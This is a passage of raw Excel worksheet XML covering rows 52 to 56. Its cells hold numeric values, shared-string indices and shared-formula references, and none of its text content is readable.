      <c r="P52" s="74">
        <v>1.0</v>
      </c>
      <c r="Q52" s="74">
        <v>0.0</v>
      </c>
      <c r="R52" s="100" t="s">
        <v>106</v>
      </c>
      <c r="S52" s="146" t="s">
        <v>619</v>
      </c>
      <c r="T52" s="146" t="s">
        <v>620</v>
      </c>
      <c r="U52" s="77" t="s">
        <v>621</v>
      </c>
      <c r="V52" s="76" t="s">
        <v>144</v>
      </c>
      <c r="W52" s="76" t="s">
        <v>622</v>
      </c>
      <c r="X52" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y52" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z52" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA52" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB52" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC52" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD52" s="147" t="s">
        <v>623</v>
      </c>
      <c r="AE52" s="148">
        <v>2.0</v>
      </c>
      <c r="AF52" s="148">
        <v>792.0</v>
      </c>
      <c r="AG52" s="149" t="s">
        <v>12</v>
      </c>
      <c r="AH52" s="147" t="s">
        <v>623</v>
      </c>
      <c r="AI52" s="147"/>
      <c r="AJ52" s="147"/>
      <c r="AK52" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL52" s="147"/>
      <c r="AM52" s="147"/>
      <c r="AN52" s="147"/>
      <c r="AO52" s="147"/>
      <c r="AP52" s="150"/>
      <c r="AQ52" s="150"/>
      <c r="AR52" s="150"/>
      <c r="AS52" s="80">
        <v>1.0</v>
      </c>
      <c r="AT52" s="80"/>
      <c r="AU52" s="80"/>
      <c r="AV52" s="80"/>
      <c r="AW52" s="80"/>
      <c r="AX52" s="80"/>
      <c r="AY52" s="80"/>
      <c r="AZ52" s="81">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="BA52" s="151" t="s">
        <v>624</v>
      </c>
      <c r="BB52" s="152">
        <v>3.0</v>
      </c>
      <c r="BC52" s="152">
        <v>1188.0</v>
      </c>
      <c r="BD52" s="149">
        <v>2101411.0</v>
      </c>
      <c r="BE52" s="153" t="s">
        <v>623</v>
      </c>
      <c r="BF52" s="153"/>
      <c r="BG52" s="153"/>
      <c r="BH52" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI52" s="153"/>
      <c r="BJ52" s="153"/>
      <c r="BK52" s="153"/>
      <c r="BL52" s="153"/>
      <c r="BM52" s="154"/>
      <c r="BN52" s="154"/>
      <c r="BO52" s="154"/>
      <c r="BP52" s="83">
        <v>1.0</v>
      </c>
      <c r="BQ52" s="83"/>
      <c r="BR52" s="83"/>
      <c r="BS52" s="83"/>
      <c r="BT52" s="83"/>
      <c r="BU52" s="83"/>
      <c r="BV52" s="83"/>
      <c r="BW52" s="84">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="BX52" s="155" t="s">
        <v>624</v>
      </c>
      <c r="BY52" s="156">
        <v>3.0</v>
      </c>
      <c r="BZ52" s="156">
        <v>1980.0</v>
      </c>
      <c r="CA52" s="149">
        <v>2101411.0</v>
      </c>
      <c r="CB52" s="155" t="s">
        <v>623</v>
      </c>
      <c r="CC52" s="155"/>
      <c r="CD52" s="155"/>
      <c r="CE52" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF52" s="155"/>
      <c r="CG52" s="155"/>
      <c r="CH52" s="155"/>
      <c r="CI52" s="155"/>
      <c r="CJ52" s="157"/>
      <c r="CK52" s="157"/>
      <c r="CL52" s="157"/>
      <c r="CM52" s="86">
        <v>1.0</v>
      </c>
      <c r="CN52" s="86"/>
      <c r="CO52" s="86"/>
      <c r="CP52" s="86"/>
      <c r="CQ52" s="86"/>
      <c r="CR52" s="86"/>
      <c r="CS52" s="86"/>
      <c r="CT52" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU52" s="158" t="s">
        <v>625</v>
      </c>
      <c r="CV52" s="158">
        <v>6.0</v>
      </c>
      <c r="CW52" s="158">
        <v>2380.0</v>
      </c>
      <c r="CX52" s="149" t="s">
        <v>626</v>
      </c>
      <c r="CY52" s="159" t="s">
        <v>623</v>
      </c>
      <c r="CZ52" s="159"/>
      <c r="DA52" s="159"/>
      <c r="DB52" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC52" s="159"/>
      <c r="DD52" s="159"/>
      <c r="DE52" s="159"/>
      <c r="DF52" s="159"/>
      <c r="DG52" s="160"/>
      <c r="DH52" s="160"/>
      <c r="DI52" s="160"/>
      <c r="DJ52" s="89">
        <v>1.0</v>
      </c>
      <c r="DK52" s="89"/>
      <c r="DL52" s="89"/>
      <c r="DM52" s="89"/>
      <c r="DN52" s="89"/>
      <c r="DO52" s="89"/>
      <c r="DP52" s="89"/>
      <c r="DQ52" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR52" s="161"/>
      <c r="DS52" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT52" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU52" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV52" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW52" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX52" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY52" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ52" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA52" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB52" s="74">
        <v>0.0</v>
      </c>
      <c r="EC52" s="74">
        <v>0.0</v>
      </c>
      <c r="ED52" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE52" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="53" ht="153.75" customHeight="1">
      <c r="B53" s="117" t="s">
        <v>534</v>
      </c>
      <c r="C53" s="118" t="s">
        <v>12</v>
      </c>
      <c r="D53" s="118" t="s">
        <v>612</v>
      </c>
      <c r="E53" s="118" t="s">
        <v>627</v>
      </c>
      <c r="F53" s="118" t="s">
        <v>628</v>
      </c>
      <c r="G53" s="118" t="s">
        <v>12</v>
      </c>
      <c r="H53" s="118" t="s">
        <v>12</v>
      </c>
      <c r="I53" s="120" t="s">
        <v>282</v>
      </c>
      <c r="J53" s="120" t="s">
        <v>283</v>
      </c>
      <c r="K53" s="120" t="s">
        <v>629</v>
      </c>
      <c r="L53" s="74">
        <v>1.0</v>
      </c>
      <c r="M53" s="74">
        <v>1.0</v>
      </c>
      <c r="N53" s="74">
        <v>1.0</v>
      </c>
      <c r="O53" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P53" s="121">
        <v>1.0</v>
      </c>
      <c r="Q53" s="121">
        <v>0.0</v>
      </c>
      <c r="R53" s="99" t="s">
        <v>187</v>
      </c>
      <c r="S53" s="122" t="s">
        <v>12</v>
      </c>
      <c r="T53" s="122" t="s">
        <v>630</v>
      </c>
      <c r="U53" s="123" t="s">
        <v>631</v>
      </c>
      <c r="V53" s="122" t="s">
        <v>632</v>
      </c>
      <c r="W53" s="122" t="s">
        <v>633</v>
      </c>
      <c r="X53" s="99" t="s">
        <v>13</v>
      </c>
      <c r="Y53" s="99" t="s">
        <v>106</v>
      </c>
      <c r="Z53" s="99" t="s">
        <v>112</v>
      </c>
      <c r="AA53" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB53" s="99" t="s">
        <v>112</v>
      </c>
      <c r="AC53" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AD53" s="124" t="s">
        <v>12</v>
      </c>
      <c r="AE53" s="124" t="s">
        <v>12</v>
      </c>
      <c r="AF53" s="124" t="s">
        <v>12</v>
      </c>
      <c r="AG53" s="125" t="s">
        <v>12</v>
      </c>
      <c r="AH53" s="124" t="s">
        <v>12</v>
      </c>
      <c r="AI53" s="124"/>
      <c r="AJ53" s="124"/>
      <c r="AK53" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL53" s="124"/>
      <c r="AM53" s="124"/>
      <c r="AN53" s="124"/>
      <c r="AO53" s="124"/>
      <c r="AP53" s="126"/>
      <c r="AQ53" s="126"/>
      <c r="AR53" s="126"/>
      <c r="AS53" s="126">
        <v>0.0</v>
      </c>
      <c r="AT53" s="126"/>
      <c r="AU53" s="126"/>
      <c r="AV53" s="126"/>
      <c r="AW53" s="126"/>
      <c r="AX53" s="126"/>
      <c r="AY53" s="126"/>
      <c r="AZ53" s="127">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA53" s="128" t="s">
        <v>12</v>
      </c>
      <c r="BB53" s="128" t="s">
        <v>12</v>
      </c>
      <c r="BC53" s="128" t="s">
        <v>12</v>
      </c>
      <c r="BD53" s="125" t="s">
        <v>12</v>
      </c>
      <c r="BE53" s="128" t="s">
        <v>12</v>
      </c>
      <c r="BF53" s="128"/>
      <c r="BG53" s="128"/>
      <c r="BH53" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI53" s="128"/>
      <c r="BJ53" s="128"/>
      <c r="BK53" s="128"/>
      <c r="BL53" s="128"/>
      <c r="BM53" s="129"/>
      <c r="BN53" s="129"/>
      <c r="BO53" s="129"/>
      <c r="BP53" s="129">
        <v>0.0</v>
      </c>
      <c r="BQ53" s="129"/>
      <c r="BR53" s="129"/>
      <c r="BS53" s="129"/>
      <c r="BT53" s="129"/>
      <c r="BU53" s="129"/>
      <c r="BV53" s="129"/>
      <c r="BW53" s="130">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX53" s="131">
        <v>50447.0</v>
      </c>
      <c r="BY53" s="131">
        <v>1.0</v>
      </c>
      <c r="BZ53" s="131">
        <v>3.0</v>
      </c>
      <c r="CA53" s="125" t="s">
        <v>12</v>
      </c>
      <c r="CB53" s="131">
        <v>50447.0</v>
      </c>
      <c r="CC53" s="131"/>
      <c r="CD53" s="131"/>
      <c r="CE53" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF53" s="131"/>
      <c r="CG53" s="131"/>
      <c r="CH53" s="131"/>
      <c r="CI53" s="131"/>
      <c r="CJ53" s="132"/>
      <c r="CK53" s="132"/>
      <c r="CL53" s="132"/>
      <c r="CM53" s="132">
        <v>0.0</v>
      </c>
      <c r="CN53" s="132"/>
      <c r="CO53" s="132"/>
      <c r="CP53" s="132"/>
      <c r="CQ53" s="132"/>
      <c r="CR53" s="132"/>
      <c r="CS53" s="132"/>
      <c r="CT53" s="133">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU53" s="134" t="s">
        <v>290</v>
      </c>
      <c r="CV53" s="134">
        <v>3.0</v>
      </c>
      <c r="CW53" s="134">
        <v>7.0</v>
      </c>
      <c r="CX53" s="125" t="s">
        <v>149</v>
      </c>
      <c r="CY53" s="134">
        <v>50447.0</v>
      </c>
      <c r="CZ53" s="134"/>
      <c r="DA53" s="134"/>
      <c r="DB53" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC53" s="134"/>
      <c r="DD53" s="134"/>
      <c r="DE53" s="134"/>
      <c r="DF53" s="134"/>
      <c r="DG53" s="135"/>
      <c r="DH53" s="135"/>
      <c r="DI53" s="135"/>
      <c r="DJ53" s="135">
        <v>0.0</v>
      </c>
      <c r="DK53" s="135"/>
      <c r="DL53" s="135"/>
      <c r="DM53" s="135"/>
      <c r="DN53" s="135"/>
      <c r="DO53" s="135"/>
      <c r="DP53" s="135"/>
      <c r="DQ53" s="136">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR53" s="137"/>
      <c r="DS53" s="138" t="s">
        <v>12</v>
      </c>
      <c r="DT53" s="138" t="s">
        <v>12</v>
      </c>
      <c r="DU53" s="138" t="s">
        <v>12</v>
      </c>
      <c r="DV53" s="139" t="s">
        <v>12</v>
      </c>
      <c r="DW53" s="139" t="s">
        <v>12</v>
      </c>
      <c r="DX53" s="139" t="s">
        <v>12</v>
      </c>
      <c r="DY53" s="139" t="s">
        <v>12</v>
      </c>
      <c r="DZ53" s="139" t="s">
        <v>12</v>
      </c>
      <c r="EA53" s="139" t="s">
        <v>12</v>
      </c>
      <c r="EB53" s="121">
        <v>0.0</v>
      </c>
      <c r="EC53" s="121">
        <v>0.0</v>
      </c>
      <c r="ED53" s="140">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE53" s="141" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="54" ht="153.75" customHeight="1">
      <c r="B54" s="71" t="s">
        <v>534</v>
      </c>
      <c r="C54" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D54" s="143" t="s">
        <v>612</v>
      </c>
      <c r="E54" s="72" t="s">
        <v>634</v>
      </c>
      <c r="F54" s="72" t="s">
        <v>635</v>
      </c>
      <c r="G54" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H54" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I54" s="73" t="s">
        <v>636</v>
      </c>
      <c r="J54" s="73" t="s">
        <v>637</v>
      </c>
      <c r="K54" s="73" t="s">
        <v>638</v>
      </c>
      <c r="L54" s="74">
        <v>3.0</v>
      </c>
      <c r="M54" s="74">
        <v>1.0</v>
      </c>
      <c r="N54" s="74">
        <v>1.0</v>
      </c>
      <c r="O54" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P54" s="74">
        <v>1.0</v>
      </c>
      <c r="Q54" s="74">
        <v>0.0</v>
      </c>
      <c r="R54" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S54" s="76" t="s">
        <v>639</v>
      </c>
      <c r="T54" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U54" s="77" t="s">
        <v>640</v>
      </c>
      <c r="V54" s="76" t="s">
        <v>641</v>
      </c>
      <c r="W54" s="76" t="s">
        <v>642</v>
      </c>
      <c r="X54" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y54" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z54" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA54" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB54" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC54" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD54" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE54" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF54" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG54" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH54" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI54" s="78"/>
      <c r="AJ54" s="78"/>
      <c r="AK54" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL54" s="78"/>
      <c r="AM54" s="78"/>
      <c r="AN54" s="78"/>
      <c r="AO54" s="78"/>
      <c r="AP54" s="80"/>
      <c r="AQ54" s="80"/>
      <c r="AR54" s="80"/>
      <c r="AS54" s="80">
        <v>0.0</v>
      </c>
      <c r="AT54" s="80"/>
      <c r="AU54" s="80"/>
      <c r="AV54" s="80"/>
      <c r="AW54" s="80"/>
      <c r="AX54" s="80"/>
      <c r="AY54" s="80"/>
      <c r="AZ54" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA54" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB54" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC54" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD54" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE54" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF54" s="82"/>
      <c r="BG54" s="82"/>
      <c r="BH54" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI54" s="82"/>
      <c r="BJ54" s="82"/>
      <c r="BK54" s="82"/>
      <c r="BL54" s="82"/>
      <c r="BM54" s="83"/>
      <c r="BN54" s="83"/>
      <c r="BO54" s="83"/>
      <c r="BP54" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ54" s="83"/>
      <c r="BR54" s="83"/>
      <c r="BS54" s="83"/>
      <c r="BT54" s="83"/>
      <c r="BU54" s="83"/>
      <c r="BV54" s="83"/>
      <c r="BW54" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX54" s="85">
        <v>44489.0</v>
      </c>
      <c r="BY54" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ54" s="85">
        <v>1.0</v>
      </c>
      <c r="CA54" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB54" s="85">
        <v>44489.0</v>
      </c>
      <c r="CC54" s="85"/>
      <c r="CD54" s="85"/>
      <c r="CE54" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF54" s="85"/>
      <c r="CG54" s="85"/>
      <c r="CH54" s="85"/>
      <c r="CI54" s="85"/>
      <c r="CJ54" s="86"/>
      <c r="CK54" s="86"/>
      <c r="CL54" s="86"/>
      <c r="CM54" s="86">
        <v>0.0</v>
      </c>
      <c r="CN54" s="86"/>
      <c r="CO54" s="86"/>
      <c r="CP54" s="86"/>
      <c r="CQ54" s="86"/>
      <c r="CR54" s="86"/>
      <c r="CS54" s="86"/>
      <c r="CT54" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU54" s="88" t="s">
        <v>643</v>
      </c>
      <c r="CV54" s="88">
        <v>5.0</v>
      </c>
      <c r="CW54" s="88">
        <v>5.0</v>
      </c>
      <c r="CX54" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY54" s="88" t="s">
        <v>644</v>
      </c>
      <c r="CZ54" s="88"/>
      <c r="DA54" s="88"/>
      <c r="DB54" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC54" s="88"/>
      <c r="DD54" s="88"/>
      <c r="DE54" s="88"/>
      <c r="DF54" s="88"/>
      <c r="DG54" s="89"/>
      <c r="DH54" s="89"/>
      <c r="DI54" s="89"/>
      <c r="DJ54" s="89">
        <v>0.0</v>
      </c>
      <c r="DK54" s="89"/>
      <c r="DL54" s="89"/>
      <c r="DM54" s="89"/>
      <c r="DN54" s="89"/>
      <c r="DO54" s="89"/>
      <c r="DP54" s="89"/>
      <c r="DQ54" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR54" s="91"/>
      <c r="DS54" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT54" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU54" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV54" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW54" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX54" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY54" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ54" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA54" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB54" s="74">
        <v>0.0</v>
      </c>
      <c r="EC54" s="74">
        <v>0.0</v>
      </c>
      <c r="ED54" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE54" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="55" ht="153.75" customHeight="1">
      <c r="B55" s="71" t="s">
        <v>534</v>
      </c>
      <c r="C55" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D55" s="118" t="s">
        <v>612</v>
      </c>
      <c r="E55" s="72" t="s">
        <v>645</v>
      </c>
      <c r="F55" s="72" t="s">
        <v>646</v>
      </c>
      <c r="G55" s="72" t="s">
        <v>647</v>
      </c>
      <c r="H55" s="72" t="s">
        <v>648</v>
      </c>
      <c r="I55" s="73" t="s">
        <v>649</v>
      </c>
      <c r="J55" s="73" t="s">
        <v>650</v>
      </c>
      <c r="K55" s="73" t="s">
        <v>651</v>
      </c>
      <c r="L55" s="74">
        <v>10.0</v>
      </c>
      <c r="M55" s="74">
        <v>1.0</v>
      </c>
      <c r="N55" s="74">
        <v>1.0</v>
      </c>
      <c r="O55" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P55" s="74">
        <v>1.0</v>
      </c>
      <c r="Q55" s="74">
        <v>0.0</v>
      </c>
      <c r="R55" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S55" s="76" t="s">
        <v>652</v>
      </c>
      <c r="T55" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U55" s="77" t="s">
        <v>653</v>
      </c>
      <c r="V55" s="76" t="s">
        <v>654</v>
      </c>
      <c r="W55" s="76" t="s">
        <v>655</v>
      </c>
      <c r="X55" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y55" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z55" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA55" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB55" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC55" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD55" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE55" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF55" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG55" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH55" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI55" s="78"/>
      <c r="AJ55" s="78"/>
      <c r="AK55" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL55" s="78"/>
      <c r="AM55" s="78"/>
      <c r="AN55" s="78"/>
      <c r="AO55" s="78"/>
      <c r="AP55" s="80"/>
      <c r="AQ55" s="80"/>
      <c r="AR55" s="80"/>
      <c r="AS55" s="80">
        <v>0.0</v>
      </c>
      <c r="AT55" s="80"/>
      <c r="AU55" s="80"/>
      <c r="AV55" s="80"/>
      <c r="AW55" s="80"/>
      <c r="AX55" s="80"/>
      <c r="AY55" s="80"/>
      <c r="AZ55" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA55" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB55" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC55" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD55" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE55" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF55" s="82"/>
      <c r="BG55" s="82"/>
      <c r="BH55" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI55" s="82"/>
      <c r="BJ55" s="82"/>
      <c r="BK55" s="82"/>
      <c r="BL55" s="82"/>
      <c r="BM55" s="83"/>
      <c r="BN55" s="83"/>
      <c r="BO55" s="83"/>
      <c r="BP55" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ55" s="83"/>
      <c r="BR55" s="83"/>
      <c r="BS55" s="83"/>
      <c r="BT55" s="83"/>
      <c r="BU55" s="83"/>
      <c r="BV55" s="83"/>
      <c r="BW55" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX55" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY55" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ55" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA55" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB55" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC55" s="85"/>
      <c r="CD55" s="85"/>
      <c r="CE55" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF55" s="85"/>
      <c r="CG55" s="85"/>
      <c r="CH55" s="85"/>
      <c r="CI55" s="85"/>
      <c r="CJ55" s="86"/>
      <c r="CK55" s="86"/>
      <c r="CL55" s="86"/>
      <c r="CM55" s="86">
        <v>0.0</v>
      </c>
      <c r="CN55" s="86"/>
      <c r="CO55" s="86"/>
      <c r="CP55" s="86"/>
      <c r="CQ55" s="86"/>
      <c r="CR55" s="86"/>
      <c r="CS55" s="86"/>
      <c r="CT55" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU55" s="88" t="s">
        <v>656</v>
      </c>
      <c r="CV55" s="88">
        <v>4.0</v>
      </c>
      <c r="CW55" s="88">
        <v>9.0</v>
      </c>
      <c r="CX55" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY55" s="88" t="s">
        <v>657</v>
      </c>
      <c r="CZ55" s="88"/>
      <c r="DA55" s="88"/>
      <c r="DB55" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC55" s="88"/>
      <c r="DD55" s="88"/>
      <c r="DE55" s="88"/>
      <c r="DF55" s="88"/>
      <c r="DG55" s="89"/>
      <c r="DH55" s="89"/>
      <c r="DI55" s="89"/>
      <c r="DJ55" s="89">
        <v>0.0</v>
      </c>
      <c r="DK55" s="89"/>
      <c r="DL55" s="89"/>
      <c r="DM55" s="89"/>
      <c r="DN55" s="89"/>
      <c r="DO55" s="89"/>
      <c r="DP55" s="89"/>
      <c r="DQ55" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR55" s="91"/>
      <c r="DS55" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT55" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU55" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV55" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW55" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX55" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY55" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ55" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA55" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB55" s="74">
        <v>8.0</v>
      </c>
      <c r="EC55" s="74">
        <v>0.0</v>
      </c>
      <c r="ED55" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE55" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="56" ht="153.75" customHeight="1">
      <c r="B56" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C56" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D56" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E56" s="72" t="s">
        <v>660</v>
      </c>
      <c r="F56" s="72" t="s">
        <v>661</v>
      </c>
      <c r="G56" s="72" t="s">
        <v>662</v>
      </c>
      <c r="H56" s="72" t="s">
        <v>663</v>
      </c>
      <c r="I56" s="73" t="s">
        <v>282</v>
      </c>
      <c r="J56" s="73" t="s">
        <v>283</v>
      </c>
      <c r="K56" s="73" t="s">
        <v>664</v>
      </c>
      <c r="L56" s="74">
        <v>11.0</v>
      </c>
      <c r="M56" s="74">
        <v>1.0</v>
      </c>
      <c r="N56" s="74">
        <v>1.0</v>
      </c>
      <c r="O56" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P56" s="74">
        <v>1.0</v>
      </c>
      <c r="Q56" s="74">
        <v>0.0</v>
      </c>
      <c r="R56" s="75" t="s">
        <v>269</v>
      </c>
      <c r="S56" s="76" t="s">
        <v>665</v>
      </c>
      <c r="T56" s="76" t="s">
        <v>666</v>
      </c>
      <c r="U56" s="77" t="s">
        <v>667</v>
      </c>
      <c r="V56" s="76" t="s">
        <v>668</v>
      </c>
      <c r="W56" s="76" t="s">
        <v>669</v>
      </c>
      <c r="X56" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y56" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z56" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA56" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB56" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC56" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD56" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE56" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF56" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG56" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH56" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI56" s="78"/>
      <c r="AJ56" s="78"/>
      <c r="AK56" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL56" s="78"/>
      <c r="AM56" s="78"/>
      <c r="AN56" s="78"/>
      <c r="AO56" s="78"/>
      <c r="AP56" s="80"/>
      <c r="AQ56" s="80"/>
      <c r="AR56" s="80"/>
      <c r="AS56" s="80">
        <v>0.0</v>
      </c>
      <c r="AT56" s="80"/>
      <c r="AU56" s="80"/>
      <c r="AV56" s="80"/>
      <c r="AW56" s="80"/>
      <c r="AX56" s="80"/>
      <c r="AY56" s="80"/>
      <c r="AZ56" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA56" s="102">
        <v>2006443.0</v>
      </c>
      <c r="BB56" s="82">
        <v>1.0</v>
      </c>
      <c r="BC56" s="82">
        <v>1.0</v>
      </c>
      <c r="BD56" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE56" s="102">
        <v>2006443.0</v>
      </c>
      <c r="BF56" s="102"/>
      <c r="BG56" s="102"/>
      <c r="BH56" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI56" s="102"/>
      <c r="BJ56" s="102"/>
      <c r="BK56" s="102"/>
      <c r="BL56" s="102"/>
      <c r="BM56" s="103"/>
      <c r="BN56" s="103"/>
      <c r="BO56" s="103"/>
      <c r="BP56" s="83">
        <v>1.0</v>
      </c>
      <c r="BQ56" s="83"/>
